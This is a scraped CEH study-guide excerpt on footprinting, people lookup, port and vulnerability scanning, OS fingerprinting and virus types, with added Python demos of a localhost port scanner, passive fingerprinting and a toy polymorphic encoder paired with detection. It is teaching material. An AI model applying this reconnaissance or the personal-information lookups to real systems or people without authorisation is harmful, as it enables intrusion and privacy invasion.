ceh course material
Post on 06-Jul-2018
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 1/67
CERTIFIED ETHICAL HACKER
Study Guide
copyright © 2016 EAPL 1
database to crash. As a result, developers and users were unable to upload or download any applications.
DIFFERENCE BETWEEN HACKER AND CRACKER
There are lots of articles on the internet about the difference between Hackers and Crackers. For many years the media has erroneously used the word Hacker where it meant Cracker, so the general public now believes a hacker is someone who breaks into computer systems, cracks passwords, defaces websites and misuses them. This is untrue, and it demoralizes some of our most talented hackers. You can judge how widespread the misconception is from the fact that even Wikipedia, the world's biggest reference source, defines hackers in an incorrect way. Wikipedia has defined hackers in the following way:
"Hacking is unauthorised use of computer and network resources. (The term "Hacker" originally meant a very gifted programmer. In recent years though, with easier access to multiple systems, it now has negative implications.)"
There is a very thin line between the hacker and the cracker. Like a coin with two faces, heads or tails, the same is true of computer experts: some use their techniques and expertise to help others and to secure systems and networks, and some misuse them for their own selfish reasons.
There are several traditional ways of telling hackers and crackers apart. In this book we will present them in order of their acceptance in the computer and IT market. First of all, let me give you the basic definitions of both hackers and crackers.
These definitions are as follows:
Hackers: A Hacker is a person who is extremely interested in exploring the inner, recondite workings of any computer system or network. Most often, hackers are expert programmers. These are also called Ethical Hackers or white hat hackers, and the hacking they perform is called ethical hacking.
Ethical hacking means you think like a hacker: first you hack the system and find the loopholes, then you correct those loopholes. These hackers protect the cyber world from every possible threat and fix security loopholes before anyone else can exploit them. These people are also called the "GURUS" of computer security.
Crackers: Crackers, or Black Hat hackers, or cheaters, or simply criminals. They are called criminals because they have the mind-set of causing harm to security: they steal very useful data and use it in wrong ways. Phishers also come in this category; they steal account information, credit card numbers and money over the Net.
Below is the diagram which shows the basic difference between crackers (black hat hackers) and Hackers (ethical hackers, white hat hackers).
We hope this will help you to clear most of your doubts about hackers and crackers. And the most important thing: until and unless an ethical hacker thinks like a cracker, you can never become an expert ethical hacker, because to get the most out of any computer system you must understand the cracker's mind-set, what they can do and up to what level they can do damage.
Now, when you identify vulnerabilities and loopholes: if you fix them so that in future nobody can breach that same vulnerability, then you are a Hacker, an ethical hacker, a White Hat hacker. If you utilize that loophole for misdeeds or for fun, then it is cracking, or Black Hat hacking. Black hat hackers are intelligent people, but criminals; the cyber cops simply call them evil geniuses.
BEST OPERATING SYSTEM FOR HACKERS
Most users are confused about which operating system is best for hackers and for hacking activities like cracking wireless network passwords, network sniffing, reverse engineering, application hacking and other encryption and spoofing tools. The operating system we suggest is BackTrack or Kali Linux. (BackTrack is no longer maintained: its developers replaced it with Kali Linux in 2013, so everything said about BackTrack below applies to Kali today.)
But you can also give Matriux and Knoppix a try. Matriux OS is just awesome, but it is still under construction, as the designers are still working on it and patching it.
Now let's discuss the functionality of the BackTrack operating system in more detail.
Best Operating System: BackTrack Linux
BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless of whether you make BackTrack your primary operating system, boot from a Live DVD, or run it from your favorite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
BackTrack is intended for all audiences, from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest collection of security tools to date.
BackTrack is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hat hackers, it provides easy access to software that facilitates exploitation of secured systems and reverse engineering. For white-hatters, it is a penetration testing kit that finds holes in a security scheme. See, everybody wins!
Major Features of BackTrack Linux
BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will not enter monitor mode or inject packets without the MadWifi driver patch. With BackTrack, you don't need to worry about that; it's just plug-and-play, ready to go.
What's great is that this Linux distribution comes Live-on-CD, so no installation is needed. However, once you experience BackTrack you will realize that it is a must to download this operating system and install it on your laptop. At the very least, download the VMware Virtual Appliance for BackTrack, and make sure you also install the VMware Tools for Linux. Many features will still work in VMware mode (wireless monitor mode and injection are the usual exception, because the VM only sees an emulated adapter unless you pass a USB adapter through to it).
• Based on: Debian, Ubuntu
• Origin: Switzerland
• Architecture: i386
• Desktop: Fluxbox, KDE
• Category: Forensics, Rescue, Live Medium
• Cost: Free
Hacking Tools:
BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
BackTrack includes many well known security tools including:
• Metasploit integration
• RFMON injection capable wireless drivers
• Kismet
• Nmap
• Ettercap
• Wireshark (formerly known as Ethereal)
• BeEF (Browser Exploitation Framework)
A large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges its tools into 11 categories:
• Information Gathering
• Network Mapping
• Vulnerability Identification
• Web Application Analysis
• Radio Network Analysis (802.11, Bluetooth, RFID)
• Penetration (Exploit & Social Engineering Toolkit)
• Privilege Escalation
• Maintaining Access
• Digital Forensics
• Reverse Engineering
• Voice Over IP
CHAPTER 2: FOOTPRINTING
Footprinting and how it can be helpful to hack systems
2. Now you can use this information to search for more about the person, simply using Google, as shown in the next snapshot.
Now it's up to you how much information you want to explore about the person and the website you want to hack.
I think you will all like this! We will continue our discussion on FOOTPRINTING tomorrow as well, as it is the most important phase. We will explore more information in the next class; I will explain a few more interesting facts and information-gathering tricks, so read on.
UNEARTHING BASIC INFORMATION
First of all we will focus on unearthing the basic information about the site, i.e. its IP address and server information. I will show you with the help of snapshots.
First go to START > RUN > type cmd, then type tracert www.websitename.com. Here we will use two basic commands in the command prompt (cmd):
tracert www.websitetobeanalysed.com
and
ping www.websitename.com
It will look something like this (we traced the route to www.amulive.com):
1. Shows our gateway of connectivity.
2. Shows our outgoing footprint IP, i.e. the IP of ours that the website sees.
3. Shows which service provider our connectivity passes through. I use BSNL but it is showing Airtel, because I prefer Airtel's DNS for quick surfing.
The next hops show the IPs of the web servers through which amulive is being maintained.
After this we come to know the IP of the website and the IPs of its web servers, which are used further. (Keep in mind that the last hop is whatever answers for that name, often a load balancer or CDN edge rather than the origin server, and that a hop shown as asterisks is simply a router that does not send ICMP time-exceeded replies.)
The website's IP can be used to gather more information about the website.
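Reading a tracert by eye, as described above, can be automated. The following is an added example (my code, not part of the course material) that parses Windows tracert output and labels each hop the way the annotated screenshot does: the RFC 1918 hop is your gateway, the first public address is the ISP side, and the final hop is the target. The tracert text, hostnames and addresses are constructed for the demo. Hop classification uses explicit private and carrier-NAT (100.64.0.0/10) ranges rather than ipaddress.is_private, because Python also counts the documentation ranges used in the sample as private.

```python
import ipaddress
import re

# Constructed sample of Windows "tracert" output (not a real capture); the
# hostnames and addresses are documentation/example ranges, not real hosts.
SAMPLE_TRACERT = """\
Tracing route to www.example.test [203.0.113.10]
over a maximum of 30 hops:

  1     1 ms     1 ms     1 ms  192.168.1.1
  2    14 ms    13 ms    15 ms  100.64.0.1
  3    18 ms    17 ms    19 ms  isp-core.example.net [198.51.100.7]
  4     *        *        *     Request timed out.
  5    42 ms    41 ms    43 ms  203.0.113.10

Trace complete.
"""

HOP_RE = re.compile(r"^\s*(\d+)\s+")            # hop lines start with the hop number
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# Ranges that tell us where a hop sits, listed explicitly instead of relying on
# ipaddress.is_private (which also flags the 198.51.100/24 and 203.0.113/24
# documentation ranges used in the sample above).
LAN_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16")]
CGNAT_NET = ipaddress.ip_network("100.64.0.0/10")


def classify(ip):
    """Label a hop address: LAN gateway, carrier-grade NAT, or public Internet."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in LAN_NETS):
        return "lan"
    if addr in CGNAT_NET:
        return "cgnat"
    return "public"


def parse_tracert(text):
    """Return [(hop_number, ip_or_None)] for every hop line in tracert output.

    The "Tracing route to ... [ip]" line is skipped; a hop with no IPv4 address
    (all three probes timed out) is recorded as None so numbering stays intact.
    """
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        is_hop_line = " ms" in line or "*" in line
        if not is_hop_line:
            continue
        ips = IPV4_RE.findall(line)
        hops.append((int(m.group(1)), ips[-1] if ips else None))
    return hops


def summarize(text):
    """Pull out what the annotated screenshot points at: the local gateway,
    the first public address on the path (the ISP side), and the final hop,
    which is whatever answers for the target name (server, load balancer or
    CDN edge)."""
    hops = parse_tracert(text)
    answered = [(n, ip) for n, ip in hops if ip]
    return {
        "hops": len(hops),
        "timed_out": [n for n, ip in hops if ip is None],
        "gateway": next((ip for _, ip in answered if classify(ip) == "lan"), None),
        "first_public_hop": next((ip for _, ip in answered if classify(ip) == "public"), None),
        "target": answered[-1][1] if answered else None,
        "roles": {ip: classify(ip) for _, ip in answered},
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_TRACERT).items():
        print(f"{key}: {value}")
```

Feed it the text of a real `tracert host > trace.txt` and it gives you the same three facts the course reads off the screenshot, plus a list of the hops that hid behind asterisks.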
How to find the personal information about an individual over the Net ??
It's one of the most important tasks. It's also helpful in finding fake profiles. Unfortunately this is limited, but we can use it to the most. There are two websites which will help us:
1. http://people.yahoo.com: best site to trace people for their personal information and also for reverse phone or mobile number look-up.
2. http://www.intellius.com: but this site is limited to the US only.
Sample report from Intellius:
Satellite picture of Joe's house from Intellius:
Now, using these sites, you will be able to collect the personal information of individuals and also be able to identify fake profiles.
TOOLS NEEDED FOR FOOTPRINTING:
You can avoid the above hectic work by using this tool: SpiderFoot
Download link: http://www.binarypool.com/spiderfoot
Information about SpiderFoot:
SpiderFoot is a free, open-source, domain footprinting tool. Given one or multiple domain names (and when I say domains, I'm referring to the DNS kind, not Windows domains), it will scrape the websites on that domain, as well as search Google, Netcraft, Whois and DNS to build up information like:
• Subdomains
• Affiliates
• Web server versions
• Users (i.e. ~user)
• Similar domains
• Email addresses
• Netblocks
ADDITIONAL FOOTPRINTING TOOLS:
Note: all these tools are freeware. You can easily Google them and download them.
• Whois
• Nslookup
• ARIN
• NeoTrace
• VisualRoute Trace
• SmartWhois
• eMailTrackerPro
• Website Watcher
• Google Earth
• GEO Spider
• HTTrack Web Copier
• E-mail Spider
This is all about footprinting. Now use the gathered information to build a basic but detailed profile of the website/person.
CHAPTER 3: SCANNING NETWORKS
Scanning and Attacking Open Ports
In the scanning part we will cover the following topics in detail:
• Definition of scanning
• Types and objectives of scanning
• Understanding scanning methodology
• Checking live systems and open ports
• Understanding scanning techniques
• Different tools present to perform scanning
• Understanding banner grabbing and OS fingerprinting
• Drawing network diagrams of vulnerable hosts
• Preparing proxies
• Understanding anonymizers
• Scanning countermeasures
What is scanning ?? And why do we focus on that ?
Scanning, as the name says, means that we scan something to find out some details. Scanning basically refers to gathering the following four pieces of information. We scan systems for four basic purposes:
• To find the specific IP address
• Operating system
• System architecture
• Services running on the system
The various types of scanning are as follows:
• Port Scanning
• Network Scanning
• Vulnerability Scanning
I want to define these terms here, as they are of great use in further tutorials.
PORT SCANNING: There are 65,535 TCP ports on a computer (and as many UDP ports), of which ports 0-1023 are the well-known ports reserved for system or OS services. In port scanning we scan for the open ports which can be used to attack the victim computer. A series of connection attempts is sent to the computer to learn about its network services: an open port means a service is listening there, and the banner it returns often tells you which service and version. Through this we know which port we will use to attack the victim.
Network Scanning: Network scanning is basically the procedure of finding the active hosts on the network, i.e. which addresses in a range are alive. This is done either for the purpose of attacking them or for a network security assessment, i.e. how secure the network is.
Vulnerability Scanning: As the name says, in this type of scanning we scan the systems to find vulnerabilities, i.e. weaknesses in the OS, services or database. Once we find a vulnerability or loophole we can utilize it to attack the victim through it.
OBJECTIVES OF SCANNING
These are the primary objectives of scanning, i.e. why we do scanning:
• To detect the live systems running on the network.
• To discover which ports are active/running.
• To discover the operating system running on the target system (fingerprinting).
• To discover the services running on the target system.
• To discover the IP address of the target system.
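The first four objectives above (live hosts, open ports, services, and what version they announce) are what a port scanner with banner grabbing delivers. The following is an added example (my code, not the course's) of the simplest technique, a TCP connect scan: complete the three-way handshake on each port, read whatever the service says first, and if it stays silent poke it with a minimal HTTP request. So that it runs offline, it starts three throwaway listeners on 127.0.0.1 with constructed banners (an SSH-style and an SMTP-style service that speak first, and an HTTP-style one that only answers a request), scans them plus one closed port, and reports what each port said. Nmap's -sT and -sV do the same thing at scale; a SYN scan needs raw sockets and is not shown here.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed banners for the throwaway listeners the demo starts on 127.0.0.1.
# They are not real services; they only exist so the scan has something to find.
FAKE_SERVICES = {
    "ssh":  b"SSH-2.0-OpenSSH_7.4\r\n",                 # talks first
    "smtp": b"220 mail.example.test ESMTP ready\r\n",   # talks first
    "http": b"",                                        # silent until asked
}
HTTP_REPLY = b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.6\r\n\r\n"


def start_listener(banner):
    """Bind a listener on an ephemeral port; return (port, stop_event)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)          # so the accept loop can notice the stop flag
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                if banner:
                    conn.sendall(banner)
                else:
                    conn.settimeout(2.0)   # HTTP-style: answer only after a request
                    try:
                        if conn.recv(1024):
                            conn.sendall(HTTP_REPLY)
                    except socket.timeout:
                        pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], stop


def grab_banner(host, port, timeout=0.5):
    """TCP connect scan of one port: None if closed, otherwise the banner the
    service volunteered, or what it said back to a minimal HTTP request."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""
            if not data:
                try:
                    s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
                    data = s.recv(1024)
                except (socket.timeout, OSError):
                    data = b""
            return data.decode("latin-1").strip()
    except (socket.timeout, OSError):   # ConnectionRefusedError is an OSError
        return None


def scan(host, ports, workers=32):
    """Connect-scan the ports in parallel; return {port: banner} for open ones."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, grab_banner(host, p)), ports))
    return {p: b for p, b in results if b is not None}


def demo():
    """Start the constructed services, scan them plus one closed port, stop
    them, and return {service_name: banner}."""
    listeners = {name: start_listener(b) for name, b in FAKE_SERVICES.items()}
    tmp = socket.socket()                  # grab and release a port so it is closed
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    ports = [port for port, _ in listeners.values()] + [closed_port]
    try:
        found = scan("127.0.0.1", ports)
    finally:
        for _, stop in listeners.values():
            stop.set()
    report = {name: found.get(port) for name, (port, _) in listeners.items()}
    report["closed"] = found.get(closed_port)
    return report


if __name__ == "__main__":
    for name, banner in demo().items():
        print(f"{name:6s} -> {banner!r}")
```

Run it as a script to see the report. scan() works against any host and port list, but a connect scan completes every handshake and so shows up in the target's logs; only point it at systems you are authorised to test.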
We will prefer TOOLS for this because they reduce our hectic work. The first tool that we use is NMAP:
DOWNLOAD: http://nmap.org/dist/nmap-5.x-setup.exe
Features of NMAP:
• Nmap is used to carry out port scanning, OS detection, version detection, ping sweeps and many other techniques.
• It scans a large number of machines at one time.
• It is supported on many operating systems.
• It can carry out all types of port scanning techniques (TCP connect, SYN, FIN/Xmas/Null, UDP and more).
SECOND TOOL IS NET TOOLS 5.0.70:
It is a collection of various networking tools, a must for beginners.
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-2213.html
• Net Tools Suite Pack is a collection of scanning tools.
• This toolset contains tons of port scanners, flooders, web rippers and mass e-mailers. Note: some of these tools may not work, but some are too good. (Be aware that the flooders and mass-mailers in such bundles are attack tools rather than assessment tools, and that "free" tool packs from download portals are a classic trojan delivery vector, exactly the scenario the Trojans chapter below describes.)
First of all, what is OS fingerprinting?
What is OS Fingerprinting ??
OS fingerprinting is the method of determining the operating system that is running on the target system.
The two different types of fingerprinting are:
• Active stack fingerprinting
• Passive fingerprinting
Active Stack Fingerprinting:
Based on the fact that OS vendors implement the TCP/IP stack differently. Specially crafted packets are sent to the remote OS and the responses are noted. The responses are then compared with a database to determine the OS.
Passive Fingerprinting:
Passive fingerprinting refers to indirectly scanning a system to reveal its operating system: instead of sending probes, you sniff traffic the target sends anyway. It is also based on the differing implementations of the stack and on the various ways an OS fills in the fields it chooses itself (initial TTL, TCP window size, the order of TCP options). It uses sniffing techniques instead of scanning techniques, and it is less accurate than active fingerprinting, but it is invisible to the target.
TOOL USED FOR OS FINGERPRINTING: p0f OS Fingerprinting Tool
DOWNLOAD: http://lcamtuf.coredump.cx/p0f-win32.zip
p0f v2 is a versatile passive OS fingerprinting tool. p0f can identify the operating system on:
• machines that connect to your box (SYN mode),
• machines you connect to (SYN+ACK mode),
• machines you cannot connect to (RST+ mode),
• machines whose communications you can observe.
p0f can also do many other tricks, and can detect or measure the following:
• firewall presence, NAT use (useful for policy enforcement),
• existence of a load balancer setup,
• the distance to the remote system and its uptime,
• the other guy's network hookup (DSL, OC3, avian carriers) and his ISP.
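The p0f description above boils down to: read the header fields a stack sets at its own discretion (initial TTL, SYN window size, TCP option order) and compare them against a table. The following is an added example (my code, not p0f's) that does exactly that on two constructed SYN packets built with struct: it parses the IPv4 and TCP headers, walks the option list, rounds the observed TTL up to the nearest common initial value (which also gives the hop distance p0f reports), and matches against a two-entry signature table. The signature values are commonly cited defaults picked for the demo, not p0f's real database, and the packets are fabricated with zero checksums.

```python
import struct

# A tiny signature base in the spirit of p0f's: initial TTL, SYN window size and
# the order of TCP options. The values are commonly cited defaults for these
# stacks, chosen for this example; they are not p0f's real database.
SIGNATURES = [
    {"os": "Linux 3.x/4.x", "ttl": 64,  "window": 29200,
     "opts": ["MSS", "SACK", "TS", "NOP", "WS"]},
    {"os": "Windows 7-10",  "ttl": 128, "window": 8192,
     "opts": ["MSS", "NOP", "WS", "NOP", "NOP", "SACK"]},
]
OPT_NAMES = {0: "EOL", 1: "NOP", 2: "MSS", 3: "WS", 4: "SACK", 8: "TS"}
SYN, ACK = 0x02, 0x10


def parse_ipv4_tcp(pkt):
    """Pull TTL, TCP flags, window size and option order out of a raw IPv4+TCP frame."""
    ihl = (pkt[0] & 0x0F) * 4
    ttl, proto = pkt[8], pkt[9]
    if proto != 6:
        raise ValueError("not a TCP segment")
    tcp = pkt[ihl:]
    _src, _dst, _seq, _ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    data_off = (off_flags >> 12) * 4
    flags = off_flags & 0x1FF
    opts, i = [], 20
    while i < data_off:                  # walk the options: kind[, len, data]
        kind = tcp[i]
        if kind == 0:
            opts.append("EOL")
            break
        if kind == 1:
            opts.append("NOP")
            i += 1
            continue
        opts.append(OPT_NAMES.get(kind, f"OPT{kind}"))
        i += tcp[i + 1]
    return {"ttl": ttl, "flags": flags, "window": window, "opts": opts}


def initial_ttl(observed):
    """Round an observed TTL up to the nearest common starting value."""
    return next(t for t in (32, 64, 128, 255) if observed <= t)


def fingerprint(pkt):
    """Passive guess of the sender's OS from one SYN, plus its hop distance."""
    f = parse_ipv4_tcp(pkt)
    if f["flags"] & (SYN | ACK) != SYN:  # only SYN signatures are loaded here
        return None
    ttl0 = initial_ttl(f["ttl"])
    guess = {"os": "unknown", "distance": ttl0 - f["ttl"]}
    for sig in SIGNATURES:
        if (sig["ttl"], sig["window"], sig["opts"]) == (ttl0, f["window"], f["opts"]):
            guess["os"] = sig["os"]
            break
    return guess


def build_syn(ttl, window, opts):
    """Constructed IPv4+TCP SYN with the given TTL, window and raw option bytes.
    Checksums are left zero; we only need the header fields to parse."""
    assert len(opts) % 4 == 0
    tcp_len = 20 + len(opts)
    tcp = struct.pack("!HHIIHHHH", 40000, 80, 1, 0,
                      ((tcp_len // 4) << 12) | SYN, window, 0, 0) + opts
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0, 0x4000,
                     ttl, 6, 0, bytes([10, 0, 0, 5]), bytes([10, 0, 0, 1]))
    return ip + tcp


# Constructed packets, as if sniffed a few routers away from each sender.
LINUX_SYN = build_syn(61, 29200,
    b"\x02\x04\x05\xb4" + b"\x04\x02" + b"\x08\x0a" + bytes(8) + b"\x01" + b"\x03\x03\x07")
WINDOWS_SYN = build_syn(126, 8192,
    b"\x02\x04\x05\xb4" + b"\x01" + b"\x03\x03\x08" + b"\x01\x01" + b"\x04\x02")

if __name__ == "__main__":
    for name, pkt in (("linux", LINUX_SYN), ("windows", WINDOWS_SYN)):
        print(name, fingerprint(pkt))
```

Real p0f signatures carry more (MSS-to-window ratio, IP DF bit, quirks like non-zero urgent pointers) and real stacks can be tuned to lie, which is why the text calls passive fingerprinting less accurate than active; but a table like this, fed from a sniffer, already tells Linux from Windows on a busy segment without sending a single packet.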
What is Vulnerability???
As I told you in the first class, a vulnerability is a weakness in the network, system, database etc. We can call a vulnerability a loophole, i.e. something through which the victim can be attacked. We first analyze the loophole and then try to use it to best effect to hack the victim's system, organisation or website.
TOOLS THAT WE USE FOR VULNERABILITY SCANNING ARE:
1. Nessus
2. Retina
NESSUS
The Nessus vulnerability scanner is the world leader in active scanners, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs, and across physically separate networks.
Features:
• Plug-in architecture
• NASL (Nessus Attack Scripting Language)
• Can test an unlimited number of hosts simultaneously
• Smart service recognition
• Client-server architecture
• Smart plug-ins
• Up-to-date security vulnerability database
SAMPLE SNAPSHOT:
DOWNLOAD NESSUS: http://www.nessus.org/download
RETINA
Retina Network Security Scanner, the industry and government standard for multi-platform vulnerability management, identifies known and zero-day vulnerabilities, plus provides security risk assessment, enabling security best practices, policy enforcement and regulatory audits.
DOWNLOAD RETINA: http://www.eeye.com/html/products/retina/download/index.html
Now, after scanning the systems for vulnerabilities, we are going to attack the systems, but before this we should know the risk. This risk can be reduced to a great extent by using proxies. In the next class we will discuss what proxies are, how they work, how they are going to help us, and some undetectable and untraceable proxy servers.
SCANNING AND ATTACKING OPEN PORTS
In my previous class I explained footprinting, i.e. getting the IP of the person/website/organisation you want to attack and extracting the personal information. You were all thinking, what was the use of that? In this class you will come to know why we went through the footprinting and analysis part.
I think that's enough for today. We will discuss more on scanning tomorrow; until then, try these tools. If you have any problem using these tools then you can ask me; I will help you use them.
INTRODUCTION TO TROJANS, VIRUSES AND BACKDOORS
Welcome back guys. After a heavy, busy schedule I come with the next hacking tutorial. I think everybody who uses a computer has faced the problem of viruses at least once in life. In today's class I will introduce what Trojans, viruses, backdoors, worms etc. are, and how they work to infect the system. In later classes we will discuss more about them, like how to get rid of viruses and Trojans, how to remove them and, most importantly, how to use them for hacking victims' systems. So guys, keep reading.
Let's start with viruses: what they are and how they work.
VIRUSES:
A virus is a self-replicating program that propagates its own code by attaching copies of itself to other executable code, like executable files (.exe), dynamic link libraries (.dll) etc. A virus generally operates in the background and, of course, without the desire of the user, as no one wants a virus to harm their computer. ROFL :P
Some well-known characteristics of viruses:
• A memory-resident virus stays in memory and replicates itself while the program it is attached to is running, infecting other programs as they are launched
• A non-resident virus does not stay in memory after the execution of the infected program; it infects what it can and exits with its host
• Can transform themselves by changing their code to appear different
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 32/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 33/67
Fig: Infection phase: how the virus attaches itself to .exe files to infect programs.
Fig: Attack phase: how files get fragmented and system speed slows down.
DIFFERENCE BETWEEN WORMS AND VIRUSES
Most of us think that worms are viruses and that they work like viruses, but this is not the real scenario. There is a big difference between general viruses and worms.
A worm is a self-replicating program that, unlike a virus, does not attach itself to other programs: it is a stand-alone program that uses memory and the network. A worm spreads through the network automatically, by itself, but a virus does not; a virus needs a user to run (or share) the infected host program.
How to detect if your system is infected by a virus??
This is one of the major questions to answer, and the simplest answer is that there are some general indications that indicate whether the system is infected or not.
General indications are stated below:
• Programs take longer to load than normal, because the virus halts the normal working of programs as it attaches itself to them, so the execution time increases.
• The computer's hard drive constantly runs out of free space.
• Files have strange names which are not recognizable.
• Programs act erratically (programs give errors on use).
• Resources are used up easily (can be easily viewed using Task Manager).
None of these is proof by itself; a fragmented disk or a buggy program produces the same symptoms, so treat them as a reason to scan, not as a diagnosis.
HOW DOES THE VIRUS INFECT THE SYSTEM??
Viruses infect the system in the following way:
1. Loads itself into memory and checks for executables on the disk.
2. Appends the malicious code to a legitimate program which is important to the user.
3. Since the user is unaware of the replacement, he/she launches the infected program.
4. As a result of the infected program being executed, other programs get infected as well.
5. The above cycle continues until the user realizes the anomaly within the system.
STAGES OF VIRUS LIFE CYCLE FROM DESIGN TO ELIMINATION
The life cycle indicated above is the general life cycle of a virus, from the design phase to the elimination phase.
VIRUS CLASSIFICATION / TYPES OF VIRUSES
Viruses are classified on the basis of two basic things:
1. What they infect
2. How they infect
Examples:
System Sector or Boot Virus:
• Infects disk boot sectors and records.
File Virus:
• Infects executables in the OS file system.
Macro Virus:
• Infects documents, spreadsheets and databases such as Word, Excel and Access.
Source Code Virus:
• Overwrites or appends host code by adding Trojan code to it.
Network Virus:
• Spreads itself via email by using the commands and protocols of the computer network.
Different Types of Virus and Worms Explained
System Sector Viruses
System sectors are special areas on your disk containing programs that are executed when you boot (start) your PC. System sectors (Master Boot Record and DOS Boot Record) are often targets for viruses. These boot viruses use all of the common viral techniques to infect and hide themselves. They rely on an infected floppy disk left in the drive when the computer starts; they can also be "dropped" by some file infectors or Trojans.
Stealth Virus
These viruses evade anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the request to the virus instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it appears as if the file is "clean".
Bootable CD-ROM Virus
These are a new type of virus that destroys the hard disk data content when booted with the infected CD-ROM.
Example: Someone might give you a LINUX BOOTABLE CD-ROM. When you boot the computer using the CD-ROM, all your data is gone. No anti-virus can stop this, because the AV software (or the OS) is not even loaded when you boot from a CD-ROM.
Self-Modification Virus
Most modern antivirus programs try to find virus patterns inside ordinary programs by scanning them for virus signatures. A signature is a characteristic byte pattern that is part of a certain virus or family of viruses. Self-modifying viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection (each infected file contains a different variant of the virus).
Polymorphic Code Virus
A well-written polymorphic virus therefore has no parts that stay the same on each infection. To enable polymorphic code the virus has to have a polymorphic engine (also called a mutating engine or mutation engine). Polymorphic code is code that mutates while keeping the original algorithm intact.
Metamorphic Virus
Metamorphic viruses rewrite themselves completely each time they are to infect new executables. Metamorphic code is code that can reprogram itself by translating its own code into a temporary representation and then back to normal code again. For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it part of the metamorphic engine.
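To make the signature argument in the self-modification and polymorphic sections concrete, the following is an added example (my code, not from the course) built around a constructed 20-byte stand-in for a virus body, a 6-byte signature cut out of it, and a toy mutation engine that XOR-encodes the body with a fresh key behind a small decoder stub. Plain signature matching finds generation 0 and misses every mutated copy; a scanner that recognises the stub, performs the decode itself and then matches (a crude version of the emulation real engines do) catches them again. The bytes, the stub layout and the signature are all invented for the demo and correspond to no real malware.

```python
# Constructed "virus body" and signature for the demonstration: arbitrary bytes,
# not a real malware sample and not a real AV signature.
VIRUS_BODY = bytes.fromhex("eb1a5e31c9b12080364246e2faeb05e8e1ffffff")
SIGNATURE = bytes.fromhex("31c9b1208036")   # a 6-byte slice a vendor might pick
STUB_MAGIC = b"\xbb\xdd"                     # toy decoder-stub marker (invented)


def signature_scan(data, signatures):
    """Classic signature matching: names of every signature found in the file."""
    return [name for name, sig in signatures.items() if sig in data]


def mutate(body, key):
    """What a self-modifying infector does on each infection: XOR-encode the body
    with a fresh key and prepend a small decoder stub carrying key and length.
    Only the stub stays constant between generations (toy layout, see above)."""
    if key == 0:
        raise ValueError("key 0 would leave the body unchanged")
    encoded = bytes(b ^ key for b in body)
    stub = STUB_MAGIC + bytes([key]) + len(encoded).to_bytes(2, "big")
    return stub + encoded


def emulate_and_scan(data, signatures):
    """Detection that survives the mutation: find each decoder stub, perform its
    decode loop ourselves, and apply the signatures to the decoded body as well."""
    hits = set(signature_scan(data, signatures))
    pos = data.find(STUB_MAGIC)
    while pos != -1:
        if pos + 5 <= len(data):
            key = data[pos + 2]
            length = int.from_bytes(data[pos + 3:pos + 5], "big")
            body = bytes(b ^ key for b in data[pos + 5:pos + 5 + length])
            hits.update(signature_scan(body, signatures))
        pos = data.find(STUB_MAGIC, pos + 1)
    return sorted(hits)


def infect(host, key):
    """Append a freshly mutated copy to a host file, as an appending file infector would."""
    return host + mutate(VIRUS_BODY, key)


def demo():
    host = b"MZ" + bytes(64)          # constructed stand-in for a clean executable
    sigs = {"Toy.Virus": SIGNATURE}
    gen0 = host + VIRUS_BODY          # unmutated original
    gen1, gen2 = infect(host, 0x5A), infect(host, 0xC3)
    return {
        "plain_signature_on_gen0": signature_scan(gen0, sigs),
        "plain_signature_on_mutants": [signature_scan(gen1, sigs), signature_scan(gen2, sigs)],
        "emulated_on_mutants": [emulate_and_scan(gen1, sigs), emulate_and_scan(gen2, sigs)],
        "mutants_differ": gen1 != gen2,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

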